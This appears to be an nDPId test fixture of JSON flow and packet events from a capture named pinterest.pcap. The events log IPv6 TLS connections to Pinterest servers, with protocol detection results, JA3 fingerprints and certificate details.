+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289710318,"flow_last_seen":1605289710318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289710318,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605289710318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710318,"pkt":"qtsDr8lk5EKm5WPyht1gCMmjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYwBu9VDYL21LWgegBAB9TESAAABAQgKz6ojDMK4Yvg="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289710576,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBjLUtaB7VQ2C+gBALgY8wAAABAQgKwrkTpM+oCrY="} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289712203,"flow_last_seen":1605289712203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289712203,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605289712203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712203,"pkt":"qtsDr8lk5EKm5WPyht1gAqhwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBwAAAAAAACAKn6wBu\/7xm0eeabeVgBAB9aoLAAABAQgKp4B90cK4Zak="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgHAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbufrJ5pt5X+8ZtIgBAL8Z94AAABAQgKwrka9Kd\/yRw="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289713743,"flow_last_seen":1605289713743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289713743,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMAAAAAAoAL9INluAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoQAAAAAoAL9IDStAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGkAAAAAoAL9INWDAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2UAAAAAoAL9IGEKAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWeOms5zmKAxNmoBJXgFEqAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoWjvEV3gBAB+5BsAAABAQgK1mIgKsK5Ifo="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} 